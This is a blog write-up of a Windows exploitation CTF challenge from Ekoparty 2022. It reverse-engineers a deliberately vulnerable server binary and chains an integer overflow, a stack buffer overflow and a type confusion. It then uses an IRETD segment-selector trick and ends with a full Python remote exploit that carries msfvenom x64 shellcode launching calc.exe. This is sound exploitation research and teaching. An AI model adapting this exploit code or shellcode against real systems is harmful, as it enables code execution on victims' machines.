Windows Exploitation Challenge - Blue Frost Security 2022 (Ekoparty)

Windows Exploitation Challenge – Blue Frost Security 2022 (Ekoparty)

Posted by: voidsec Post Date: December 1, 2022

Reading Time: 16 minutes

Last month, during Ekoparty, Blue Frost Security published a Windows challenge. Since having a Windows exploitation challenge, is one of a kind in CTFs, and since I’ve found the challenge interesting and very clever, I’ve decided to post about my reverse engineering and exploitation methodology.

Table of Contents

Challenge Requests

Only Python solutions without external libraries will be accepted
The goal is to execute the Windows Calculator (calc.exe)
The solution should work on Windows 10 or Windows 11
Process continuation is desirable (not mandatory)

You can download the target application here (backup).

High-Level Analysis

When exploring an unknown executable, one of the first things I always check is the security features that were built into the binary when it was compiled. If on Linux I’m used to checksec.sh, on Windows I use winchecksec or PESecurity; they aren’t kept updated but they serve our purpose.

Doing so, resulted in the following mitigations:

C:\Users\VoidSec>winchecksec.exe bfs-eko2022.exe

Architecture    : AMD64
Dynamic Base    : "Present"
ASLR            : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX/DEP          : "Present"
SEH             : N/A
CFG             : "NotPresent"
RFG             : "NotPresent"
SafeSEH         : N/A
GS              : "Present"
Authenticode    : False
.NET            : False

Some of these details can also be confirmed, at runtime, with a tool like System Informer (former Process Hacker):

This means that we are dealing with an x64, un-obfuscated, C++ (checked with DIE) compiled binary with ASLR, DEP and stack-canaries enabled mitigations but no CFG.

Once executed, the binary binds on 0.0.0.0, port 31415, and awaits client connection.

As per my methodology, I’ve proceeded with reverse engineering the high-level functionalities of each code block, renaming them with some meaningful labels. One thing that also helps me better visualize the code flow is colouring blocks:

Blue shades: nodes that I’m stepping through while debugging or paths followed by the software. For more complex software I’m generally tracing the execution flow with tools like PIN, Dynamorio and the Tenet IDA’s plugin.
Green shades: blocks that I want to reach or that are holding main/interesting functionalities I’d like to explore.
Black/grey: error messages/irrelevant code sections.
Orange: possible logic vulnerabilities that I’d like to further examine.
Red: possible memory corruption vulnerabilities that I’d like to further examine.

I’ve then collapsed all irrelevant nodes, leaving me with the following simplified code graph:

Handshake

I usually combine debugging and static code analysis in order to get the most out of both. I then proceeded to write a simple python “client” to interact with the target.

As soon as the software start, an always static (both in size and memory address) buffer is allocated in the heap:

As we can see from the VirtualAlloc() API call above, the buffer is allocated at address 0x10000000 and it is of size 0x1000 (4096 bytes); the memory protection for the region is RWX.

After that, we find the socket initialization, the server binding, and then it enters a loop, waiting for a client connection.
Note: the server is not multithread and only one client per time is allowed.

Data sent to the server is stored in the previously allocated heap-buffer and then a function is called. This function, opportunely renamed as handhshake_check(), has the following prototype: handhshake_check(uint buffer_length, *buffer) and once decompiled it results in the following code:

_BOOL8 __fastcall handhshake_check(__int64 buffer_length, const char * buffer) {
  return strncmp(buffer, Str2, 6 ui64) == 0;
}

This function verifies if the first 6 characters of our buffer match with the string “Hello“; if it does, the execution continues and the software sends back “Hi“.

Data Processing

After that, the execution flow is transferred to another function, which I’ve renamed as data_processing() and decompiled as follows:

int __fastcall data_processing(SOCKET socket)
{
  int result; // eax
  int v2; // eax
  unsigned int i; // [rsp+20h] [rbp-F48h]
  unsigned int header_len; // [rsp+24h] [rbp-F44h]
  unsigned int len_0; // [rsp+24h] [rbp-F44h]
  CHAR CmdLine[3840]; // [rsp+30h] [rbp-F38h] BYREF
  char packet_type; // [rsp+F30h] [rbp-38h]
  char stack_buff[8]; // [rsp+F40h] [rbp-28h] BYREF
  char packet_type_0; // [rsp+F48h] [rbp-20h]
  unsigned __int16 packet_data_length; // [rsp+F49h] [rbp-1Fh]

  for ( i = 0; i < 0x1000; i += 16 )
  {
    *(_QWORD *)&heap_buff[i] = 0x5050505050505050i64;
    *(_QWORD *)&heap_buff[i + 8] = 0xCF58585858585858ui64;
  }
  printf(" [+] Processing request\n");
  header_len = recv(socket, stack_buff, 11, 0);
  if ( header_len == -1 )
    return printf("  [-] Client data error\n");
  if ( header_len < 11ui64 )
    return printf("  [-] Bad size\n");
  if ( *(_QWORD *)stack_buff != '2202okE' )
    return printf("  [-] Wrong cookie value\n");
  packet_type = packet_type_0;
  if ( packet_type_0 != 'T' )
    return printf("  [-] Invalid packet type\n");
  if ( (__int16)packet_data_length > 3840 )     // Integer Overflow
    return printf("  [-] Invalid packet size\n");
  len_0 = recv(socket, heap_buff, packet_data_length, 0);// writing packet_data to heap-buffer
  printf(" [+] Data received: %i bytes\n", len_0);
  char_replace(CmdLine, heap_buff, len_0);
  if ( packet_type == 'T' )
  {
    printf("  [+] Message received: %s\n", CmdLine);
    send(socket, CmdLine, len_0, 0);
  }
  else
  {
    printf("  [-] Unsupported message\n");
    v2 = strlen(Str);
    send(socket, buf, v2 + 1, 0);
  }
  result = packet_type;
  if ( packet_type == 'X' )
  {
    off_7FF720E1C000 = (__int64 (__fastcall *)(_QWORD))&heap_buff[len_0];
    return off_7FF720E1C000(CmdLine);
  }
  return result;
}

In this function:

Previously allocated heap-buffer is filled with 0x5050505050505050 and 0xCF58585858585858.
Note: this is weird as memory is usually initialized to 0.
Another packet is expected; this time the content is saved on a stack buffer.
If the received packet is at least 11 bytes then the function checks if the packet contains a specific “cookie value” 0x323230326F6B45 (“Eko2022“).
Then the first byte after the “cookie value” is checked for the presence of the T character. This field is used to determine the packet’s type.
Then the 2 bytes after the packet’s type are treated as the size of the packet’s data. The packet data’s size must be lower than 0xF00 (3840 bytes).

I’ve named this structure: packet_header

struct packet_header{
    DWORD cookie_value;
    BYTE packet_type;
    SHORT packet_data_len;
}

After our packet’s header passes all the above validations, the server wait for the packet’s data. This packet (packet_data) will be saved in the previously allocated heap-buffer.

`char_replace()`

Then a function renamed as char_replace() is called; this function copies the content of packet_data (stored in the heap), to a stack buffer (CmdLine) of size 0xF00 (3840 bytes). While copying the data, it replaces all the occurrences of bytes 0x2B and 0x33 with null-bytes.

__int64 __fastcall char_replace(_BYTE *CmdLine, _BYTE *heap_buffer, unsigned int size)
{
  __int64 result; // rax
  unsigned int i; // [rsp+0h] [rbp-18h]

  for ( i = 0; ; ++i )
  {
    result = size;
    if ( i >= size )
      break;
    if ( *heap_buffer == 0x2B || *heap_buffer == 0x33 )
      *CmdLine = 0;
    else
      *CmdLine = *heap_buffer;
    ++heap_buffer;
    ++CmdLine;
  }
  return result;
}

After the copy and character replacement, the resulting data is sent back to the client.

Chaining Vulnerabilities

Integer Overflow

The packet_data_len comparison (which IDA’s decompiler fails to visualize adequately) is odd enough to investigate. As we can see from the raw assembly:

movsx   eax, packet_data_length
cmp     eax, 0F00h
jle     short loc_7FF609B81386

The packet_data_len value is loaded into the EAX register by the MOVSX opcode.

MOVSX: copies the contents of the source operand to the destination operand and sign extend the value. In 64-bit mode, the instruction’s default operation size is 32 bits.

JLE: It is a conditional jump that follows a test. It performs a signed comparison jump after a cmp if the destination operand is less than or equal to the source operand.

If we send a packet_data_len of value 0xFFFF, it will be sign-extended to 0xFFFFFFFF, treated as a negative value by the following comparison and “bypass” the length check.

Stack-based Buffer Overflow

The precedent “Integer Overflow” directly leads to a stack-based buffer overflow when the char_replace() function copies the content from the heap-buffer (at address 0x10000000) onto the CmdLine[3840] buffer using the length we have specified in the packet_header.packet_data_len field.

Before trashing the stack with the linear overflow we have, is always better to check what’s interesting on it. If with a debugger we check what’s left on the stack, after the CmdLine[3840] buffer, we will discover a couple of things:

Green: the content of the CmdLine buffer (filled with A’s up to its limit not to trigger the stack-based buffer overflow yet).
Blue: the content of the packet_type local variable.
Orange: the content of the packet_header buffer we’ve previously sent to the server.
Violet: the stack canary/cookie. Remember, the binary was compiled with the /GS flag and before data_processing()’s epilogue we can see a call to __security_check_cookie() function.
Red: the saved return pointer for the main() function.

Mitigations

Simply overwriting the saved return pointer is not a viable option as we’ll also end up overwriting the stack canary, causing the OS to kill the entire process.

Unfortunately, we do not have an information leak either as the send() function, responsible for echoing back the content of the CmdLine buffer, is not using the data_lenght value we control in the packet’s header but the actual size of packet_data we’ve sent.

We should definitely come up with something different.

Type Confusion

As mentioned before, one of the interesting pieces of data left on the stack, and sitting below our buffer, is the content of the packet_type local variable. This value is later used for the type-check comparisons:

if ( packet_type == 'T' )
  {
    printf("  [+] Message received: %s\n", CmdLine);
    send(socket, CmdLine, len_0, 0);
  }
  else
  {
        [--TRUNCATED--]
  }
  result = packet_type;
  if ( packet_type == 'X' )
  {
        [--TRUNCATED--]
  }
  return result;

As we can overwrite its value (using the linear stack-based buffer overflow previously discovered), we can cause a “type confusion” and end up in the X case.

Code Execution

If we successfully trigger the type confusion, the program will directly jump into the heap-buffer containing our packet_data and the data written during the heap-buffer “initialization” (0x5050505050505050 and 0xCF58585858585858).

These initialization bytes are not random, in fact, they are disassembled as:

pop     rax
pop     rax
pop     rax
pop     rax
pop     rax
pop     rax
pop     rax
iretd   
push    rax
push    rax
push    rax
push    rax
push    rax
push    rax
push    rax
push    rax

Without any further modification the software crash with an Access Violation error on the iretd instruction.
Note: the execution flow always jumps in the heap-buffer after the bytes we control. Cause of that, we cannot “bypass” nor overwrite the iretd instruction.

If we really want to crack this challenge we should dive into the iretd instruction.

`iretd`

Looking at the x86 Instruction Set Reference:

IRETD – interrupt return double (32-bit operand size):

Returns program control from an exception or interrupt handler to a program that was interrupted by an exception, an external interrupt, or a software-generated interrupt. In Real-Address Mode, the IRET instruction performs a far return to the interrupted program. During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.

Since we control the stack, we’re only left with the task of crafting it in a way that would allow us to gain code execution.

IRETD expects the following values on the stack:

SS
ESP
EFLAGS
CS
EIP

We can easily point EIP and ESP to our heap-buffer we control, while I’ve taken the EFLAGS value from WinDbg.

EIP: 0x10000014 start of our heap-buffer plus an offset; used to directly land at the beginning of our shellcode.
ESP: 0x10000800 a “safe” place in the “middle” of our heap-buffer. Not at the beginning of our heap-buffer, as the shellcode will sit there, and not at the end to avoid stack’s consumption messing up outside the boundaries of the heap-buffer region, triggering access violation errors.
EFLAGS: 0x246
SS and CS on the other hand, were more difficult…

Global Descriptor Table

SS and CS are used to index the Global Descriptor Table (GDT) which has descriptors for:

0x00: Null descriptor
0x10: Kernel code segment
0x18: Kernel data segment
0x20: User code segment
0x28: User data segment

We can explore them in a kernel-mode debugger, such as WinDbg, with the following command:

0: kd> !process 0 0 bfs-eko2022.exe
PROCESS ffffe303936d7080
    SessionId: 1  Cid: 0b38    Peb: 00dd2000  ParentCid: 0e90
    DirBase: 119c67002  ObjectTable: ffffb48eed28d5c0  HandleCount:  52.
    Image: bfs-eko2022.exe

0: kd> .process /r /P ffffe303936d7080
Implicit process is now ffffe303`936d7080
.cache forcedecodeptes done
Loading User Symbols
........
0: kd> dd @gdtr
fffff804`1645afb0  00000000 00000000 00000000 00000000
fffff804`1645afc0  00000000 00209b00 00000000 00409300
fffff804`1645afd0  0000ffff 00cffb00 0000ffff 00cff300
fffff804`1645afe0  00000000 0020fb00 00000000 00000000
fffff804`1645aff0  90000067 16008b45 fffff804 00000000
fffff804`1645b000  00003c00 0040f300 00000000 00000000
fffff804`1645b010  00000000 00000000 00000000 00000000
fffff804`1645b020  00000000 00000000 00000000 00000000

The first 24 bytes are “reserved” for kernel. For user mode, we want to use selectors 0x20 and 0x28.

However, it’s not quite that straightforward. Because the selectors are all 16 bytes in size, the two least significant bits of the selector will always be zero. Intel uses these two bits to represent the Requested Privilege Level (RPL). These are zero when operating in ring-0 (kernel), but as we want to move to ring-3 (user mode) we must set them to “3”.

This means that our code segment selector will be (0x20 | 0x3 = 0x23), and our data segment selector will be (0x28 | 0x3 = 0x2B).

Now, if for the code selector we don’t have any problem, the data selector on the other hand falls into to the “bad bytes” replaced by the char_replace() function.

For the code selector, we just need to find a value whose type is Data, RW. I’ve looped through all the selectors and ended up with the value 0x53:

0: kd> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P  Nl 000004f3

CS: 0x23 code segment selector
SS: 0x53 stack segment selector

Using the above settings will pivot the code execution flow up to the beginning of our shellcode but in 32-bit mode. Unfortunately, since the stack base and limit are completely messed up, as soon as we try to use the stack (e.g., PUSH EAX) the program will crash.

To properly execute our shellcode, I’ve introduced the following “prologue” at the beginning of our shellcode: JMP 0x33:0x1000001c

This “prologue” will jump some bytes further in our prologue and it also has the nice property of allowing us to specify 0x33 as the new code segment, bringing us back into 64-bit mode.
Note: if you’re wondering why I’m allowed to use the 0x33 value, note that, it is a “bad byte” only on the stack but we’re now in the heap where it can lie unaffected.

Since x64-bit doesn’t need a valid stack segment selector (it’s not used), we can finally restore the stack pointer to a meaningful value. Luckily enough, the RCX register still holds a reference to the original stack, before it was “polluted” by the IRETD instruction. We can just transfer it back into RSP with: mov rsp,rcx .

With everything restored we can execute the shellcode and finally pop calc!

Video PoC and Exploit

The complete (and commented) exploit code, IDA’s DB and target binary are available on my GitHub.

Exploit Source Code

import socket
import struct

"""
Exploit title:      Ekoparty 2022 BFS Windows Challenge
Exploit Authors:    Paolo Stagno aka VoidSec - [email protected] - https://voidsec.com
Grade:              PoC
Date:               20/11/2022
Tested on:          Windows 10 Pro x64 22H2 Build 19045.2251
Category:           remote exploit
Platform:           windows
"""

# msfvenom -a x64 --platform Windows -p windows/x64/exec cmd="calc" -f python -v shellcode
shellcode_x64 = b""
# shellcode_x64 += b"\xcc"  # INT3
shellcode_x64 += b"\xea\x1c\x00\x00\x10\x33\x00"  # 32-bit shellcode prologue restoring the CS value to 0x33 - JMP 0x33:0x1000001c
shellcode_x64 += b"\x48\x89\xCC"  # 64-bit shellcode prologue restoring old stack pointer - MOV RSP, RCX
# shellcode_x64 += b"\xcc"  # INT3
shellcode_x64 += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00"
shellcode_x64 += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2"
shellcode_x64 += b"\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
shellcode_x64 += b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7"
shellcode_x64 += b"\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c"
shellcode_x64 += b"\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
shellcode_x64 += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
shellcode_x64 += b"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88"
shellcode_x64 += b"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
shellcode_x64 += b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
shellcode_x64 += b"\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34"
shellcode_x64 += b"\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
shellcode_x64 += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
shellcode_x64 += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
shellcode_x64 += b"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
shellcode_x64 += b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49"
shellcode_x64 += b"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
shellcode_x64 += b"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
shellcode_x64 += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
shellcode_x64 += b"\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff"
shellcode_x64 += b"\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
shellcode_x64 += b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00"
shellcode_x64 += b"\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0"
shellcode_x64 += b"\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
shellcode_x64 += b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80"
shellcode_x64 += b"\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
shellcode_x64 += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
shellcode_x64 += b"\x63\x00"

print("Ekoparty 2022 - BFS' Windows Challenge")
print("> Exploit by VoidSec")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", 31415))

handshake = b"Hello\x00"
print(f"[>] Sending handshake - {len(handshake)} bytes")
client.send(handshake)
resp = client.recv(3)
if resp == b"Hi\x00":
    print("[+] ACK")

    # Packet's Header
    header = b""
    header += b"Eko2022\x00"  # cookie
    header += b"T"  # packet type
    header += b"\xFF\xFF"  # packet size; leads to integer overflow
    print(f"Header size: {len(header)} bytes")

    # Packet's Data
    packet_data_size = 3840  # 0xF00
    packet_data = b""

    # IRETD STACK; switch from x64 to x32
    packet_data += struct.pack("<I", 0x10000014)  # EIP; start of our heap-buffer + offset to land into our shellcode
    packet_data += struct.pack("<I", 0x23)  # CS; selector for user mode
    packet_data += struct.pack("<I", 0x246)  # EFLAGS; taken from WindDbg
    packet_data += struct.pack("<I", 0x10000800)  # ESP; a "safe" place in the "middle" of our heap-buffer
    packet_data += struct.pack("<I", 0x53)  # SS; a value I've found while debugging. It is of type Data RW
    print(f"IRETD STACK size: {len(packet_data)} bytes")

    # SHELLCODE
    packet_data += shellcode_x64
    print(f"Shellcode size: {len(shellcode_x64)} bytes")

    packet_data += b"A" * (packet_data_size - len(packet_data))  # fill the buffer up to where we overwrite packet_type
    packet_data += b"X"  # type confusion
    packet_data += b"X" * 7  # disassembled into 'pop rax' as we must not "trash" the stack
    # print(packet_data)
    print(f"[>] Sending packet: {len(header + packet_data)} bytes")
    client.send(header + packet_data)
    resp = client.recv(20)
    if resp == b"Unsupported message\x00":
        print("[+] Type Confusion Triggered")
    else:
        print("[!] Type Confusion Error")
else:
    print("[!] Handshake Error")
client.close()

Share this post